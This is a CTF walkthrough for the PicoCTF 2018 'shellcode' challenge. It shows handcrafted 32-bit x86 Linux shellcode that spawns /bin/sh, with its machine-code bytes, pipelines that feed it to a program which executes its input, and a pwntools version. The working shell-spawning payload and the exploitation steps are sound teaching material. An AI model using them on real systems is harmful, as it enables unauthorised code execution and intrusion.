PicoCTF 2018 - Shellcode
Note: This article is part of our PicoCTF 2018 BinExp Guide.
Spot the Bug
This one isn’t so much a bug as a giant, intentional, gaping hole:
char buf[BUFSIZE];
puts("Enter a string!");
// ...
gets(buf);
puts(buf);
// ...
puts("Thanks! Executing now...");
((void (*)())buf)();
Basically, the raw input is read until the first newline (0x0A) and stored in the buffer buf. We then attempt to call buf as if it were a function. This is a highly contrived example (on a modern system the stack would not be marked executable, so the program would segfault before ever running an instruction from buf). However, it is a beautiful blank canvas for us to learn how to hand-craft some shellcode.
Strategy
The strategy here is pretty simple: if we can fill buf with bytes that look like code, then that code will be executed.
The “classic” shellcode example is something like this (C99):
execve("/bin/sh", (char*[]){NULL}, (char*[]){NULL});
But sometimes, you’ll see this written:
execve("/bin/sh", 0, 0);
This will also work (on Linux ONLY). The difference is that the first form passes a pointer to an array that contains a NULL, while in the latter the pointer itself is NULL. Linux allows the latter, but strictly speaking the former is the correct way to invoke execve without any argv or envp.
If you can fill buf with the machine code corresponding to a call to execve like that, then the current program will be replaced with "/bin/sh" and you will have access to a shell. If you’re already sitting on some sweet shellcode, then go ahead and attempt /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4 on the shell server now.
Background Info
When compiling C code, execve is normally resolved by linking against libc, but ultimately the call itself is performed by the kernel. In fact, the kernel has its own implementation of execve, and we can request that the kernel execute it by performing a system call. Exactly which system calls are available, and how you call them, varies by platform. For 32-bit x86 programs, the exact system calls available ultimately depend on your kernel sources, but there exist tables that have done the work for you and present everything in a simple way.
Looking for SYS_execve, we see that for 32-bit Linux systems the syscall number is 0x0b (11). This value goes into the eax register. Likewise, a pointer to the filename goes into ebx, a pointer to the argv[] array goes into ecx, and a pointer to the envp[] array goes into edx. On 32-bit x86 Linux, a system call can be requested by executing the “int 0x80” instruction, which is a software interrupt (number 0x80). NOTE: There are other methods of invoking a system call as well, including sysenter and the vDSO, but the software interrupt is the simplest (and slowest) method.
We also note that we are executing buf directly, and that its value isn’t copied around first using something like strcpy or strdup. Therefore, we don’t have to worry about the buffer being truncated at a null byte, because gets() itself will continue copying past any null bytes up to the first newline ('\n' == 0x0A). The only “illegal” character that our shellcode must not contain is therefore a newline.
Now that we have all the information we need, let’s craft some shellcode by hand. Here, I’ll be using nasm to assemble my assembly code (text) into machine code (binary bytes corresponding to opcodes).
; ~/exploit_shell.S
USE32 ; Directive for nasm to indicate this is 32 bit code
; execve("/bin/sh", (char*[]){NULL}, (char*[]){NULL})
push 0x0068732f ; pushes bytes "/sh" + '\0' - but represented as a little-endian 32bit dword
push 0x6e69622f ; pushes bytes "/bin" - but represented as a little-endian 32bit dword
mov ebx, esp ; ebx = stack pointer, which points at the null-terminated byte sequence "/bin/sh"
xor eax, eax ; eax = 0
push eax ; push 0
mov al, 0x0b ; eax = 0x0b (SYS_execve)
mov ecx, esp ; ecx = stack pointer, which points at a 4 byte '0' (aka NULL)
mov edx, esp ; edx = stack pointer, which points at a 4 byte '0' (aka NULL)
int 0x80 ; syscall
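The two push immediates in the listing can look backwards at first glance. As a rough sanity check (a sketch, not part of the original exploit; the helper name stack_bytes is made up for illustration), Python's struct module can show what ends up in memory at esp after both pushes:

```python
import struct

# The two immediates from the listing, in the order they are pushed.
PUSH_SH = 0x0068732F   # pushed first, so it lands at the higher address
PUSH_BIN = 0x6E69622F  # pushed second, so it lands at the lower address (esp)

def stack_bytes(*pushed):
    """Return the bytes found at esp after pushing the given dwords in order.

    x86 stores each dword little-endian and the stack grows downward, so the
    last value pushed sits at the lowest address.
    """
    return b"".join(struct.pack("<I", value) for value in reversed(pushed))

memory = stack_bytes(PUSH_SH, PUSH_BIN)
print(memory)  # the C string that ebx points at, including its terminator
```

Read from esp upward, the bytes spell out the null-terminated path, which is why mov ebx, esp is all that is needed to get a pointer to it.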
First off, let’s make sure it assembles, and see if the resulting machine code contains any “illegal” newlines:
$ nasm -f bin exploit_shell.S -o /dev/stdout | xxd -i
0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3,
0x31, 0xc0, 0x50, 0xb0, 0x0b, 0x89, 0xe1, 0x89, 0xe2, 0xcd, 0x80
$ nasm -f bin exploit_shell.S -o /dev/stdout | xxd -i | grep -c "0x0a"
0
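Note that grep -c counts matching lines rather than individual bytes, which is fine when the answer is zero. For a per-byte view, here is a minimal Python sketch that runs the same check on the bytes copied from the xxd output above (find_bad_bytes is a hypothetical helper, not a library function):

```python
# Bytes copied from the xxd -i output above.
SHELLCODE = bytes([
    0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3,
    0x31, 0xc0, 0x50, 0xb0, 0x0b, 0x89, 0xe1, 0x89, 0xe2, 0xcd, 0x80,
])

def find_bad_bytes(payload, bad):
    """Return (offset, byte) pairs for every byte of payload that appears in bad."""
    return [(offset, byte) for offset, byte in enumerate(payload) if byte in bad]

# gets() stops at a newline, so 0x0a is the only byte that matters here.
newline_hits = find_bad_bytes(SHELLCODE, b"\n")
# A null byte would only matter if the buffer went through strcpy or similar.
null_hits = find_bad_bytes(SHELLCODE, b"\x00")

print(len(SHELLCODE), newline_hits, null_hits)
```

The single null byte it reports at offset 4 is the terminator inside the first push immediate. It is harmless for this challenge, but it is exactly the byte that would have to go if the input passed through a string copy.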
Yay! We’ve done it. We’ve constructed some machine code that should call execve and it doesn’t contain any “illegal” chars. If it did contain illegal chars, we’d have to figure out exactly where they came from and come up with alternative assembly instructions to accomplish the same thing. For instance, if null bytes were illegal, we’d have to figure out how to change push 0x0068732f into something that didn’t contain a 0x00 when encoded. You might, for instance, do a push 0x0169722e followed by a xor dword [esp], 0x01010101 (nasm syntax; other assemblers spell this xor dword ptr [esp], 0x01010101), which will result in 0x0068732f ending up on the stack as desired.
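The arithmetic behind that XOR trick is easy to verify offline. The following is a small sketch (the names TARGET, MASK and has_null are chosen here for illustration) that derives the encoded immediate and confirms that neither instruction operand contains a null byte:

```python
import struct

TARGET = 0x0068732F  # "/sh\0" as a little-endian dword; contains a null byte
MASK = 0x01010101    # XOR key applied on the stack; every byte is non-zero

def has_null(value):
    """True if the little-endian encoding of the dword contains a 0x00 byte."""
    return b"\x00" in struct.pack("<I", value)

encoded = TARGET ^ MASK   # the value to push instead of TARGET
decoded = encoded ^ MASK  # what the xor on [esp] leaves on the stack

print(hex(encoded), has_null(encoded), has_null(MASK))
print(struct.pack("<I", decoded))
```

One caveat with this particular mask: any byte of the target that equals 0x01 would itself turn into 0x00 after the XOR, so the mask has to be chosen with the target bytes (and any other forbidden bytes, such as 0x0a) in mind.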
Exploitation
First, cd into the problem directory /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4 on the shell server. Now, at this point, you’d probably be tempted to do something like this (I know I was):
$ nasm -f bin ~/exploit_shell.S -o /dev/stdout | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
Well - the good news is it didn’t crash. The bad news is it didn’t give us a shell. So… What happened?
I spent a bit of time debugging this before finally giving up and switching to pwntools (which we’ll go over in a minute). Now that I’ve come back to it, I can tell you exactly what happened: everything worked exactly the way we wrote it. The problem is that once the shellcode had been written out, there was no more input left for /bin/sh (the stream was at EOF), so the shell quit immediately. What you need is something that keeps writing into the pipe (the shell’s stdin) after the shell launches. To prove that everything is working, you can run something like this:
$ (nasm -f bin ~/exploit_shell.S -o /dev/stdout && echo && sleep 1 && echo ls) | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
flag.txt vuln vuln.c
What this does is launch a series of commands in a subshell (that’s what the ‘(’ and ‘)’ are for). That series of commands writes out the shellcode, followed by a newline, then waits for 1 second (while /bin/sh starts), then writes “ls”. The pause matters: if “ls” arrived in the same read as the shellcode, it would most likely sit in vuln’s stdio buffer and be lost when execve replaces the process. That input is fed into the ./vuln program, which turns into /bin/sh once the shellcode executes, and the shell then prints the contents of the current directory after receiving the ls command.
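The EOF behaviour is easy to reproduce without the challenge binary. The sketch below is only a stand-in: it runs /bin/sh directly (assuming it exists at that path) rather than reaching it through ./vuln, and the helper name run_shell is invented for this example. It shows that a shell whose stdin is already at EOF exits silently, while one that finds a command waiting on stdin runs it first:

```python
import subprocess

def run_shell(stdin_bytes):
    """Run /bin/sh with the given bytes on stdin and return what it printed."""
    result = subprocess.run(
        ["/bin/sh"], input=stdin_bytes, stdout=subprocess.PIPE, timeout=10
    )
    return result.stdout

# Nothing left on stdin: the shell sees EOF straight away and exits quietly.
nothing = run_shell(b"")
# A command is still waiting on stdin: the shell runs it, then exits at EOF.
something = run_shell(b"echo shell-was-here\n")

print(repr(nothing), repr(something))
```

The first case corresponds to piping only the shellcode into ./vuln, and the second to the pipeline with the trailing echo ls.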
Of course, that terminal still isn’t interactive. If you want one of those, you should do something like this:
$ cat - | (nasm -f bin ~/exploit_shell.S -o /dev/stdout && echo && cat -) | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
ls
flag.txt vuln vuln.c
cat flag.txt
picoCTF{===REDACTED===}
BOOM! You’ve achieved an interactive terminal from handcrafted shellcode using nothing but an assembler.
Now that you’ve solved shellcode, head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.
Appendix - pwntools
We’ll go into pwntools more in future guides, but here’s a quick tease of how you might do this challenge with pwntools (using its built-in shellcode, which is free of nulls and newlines):
$ python
Python 2.7.12 (default, Jul 21 2020, 15:19:50)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context.update(arch='i386', os='linux')
>>> p = process("./vuln")
[x] Starting local process './vuln'
[+] Starting local process './vuln': pid 2676856
>>> print(shellcraft.linux.sh().rstrip())
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
>>> print(enhex(asm(shellcraft.linux.sh())))
6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80
>>> p.sendline(asm(shellcraft.linux.sh()))
>>> p.interactive()
[*] Switching to interactive mode
Enter a string!
jhh///sh/bin��h�4$ri1�QjY�Q��1�j
X̀
Thanks! Executing now...
ls
flag.txt vuln vuln.c
cat flag.txt
picoCTF{===REDACTED===}
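The claim that the built-in shellcode is free of nulls and newlines can be checked against the hex dump in the transcript without installing pwntools. This is a minimal sketch using only the standard library; the hex string is copied from the enhex output above, and the variable names are chosen for illustration:

```python
import struct

# Copied verbatim from the enhex(asm(shellcraft.linux.sh())) output above.
PWNTOOLS_HEX = "6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80"

payload = bytes.fromhex(PWNTOOLS_HEX)

# Bytes that would be a problem for gets() (newline) or a string copy (null).
offending = [(offset, byte) for offset, byte in enumerate(payload) if byte in b"\x00\n"]

# The argv[0] string is built with a push/xor pair so that its nulls never
# appear in the encoded instructions: push 0x1010101, then xor with 0x1016972.
argv0 = struct.pack("<I", 0x01010101 ^ 0x01016972)

print(len(payload), offending, argv0)
```

The push/xor pair in the listing is the same null-avoidance trick described earlier for the hand-written version, applied here to the 'sh' argument string.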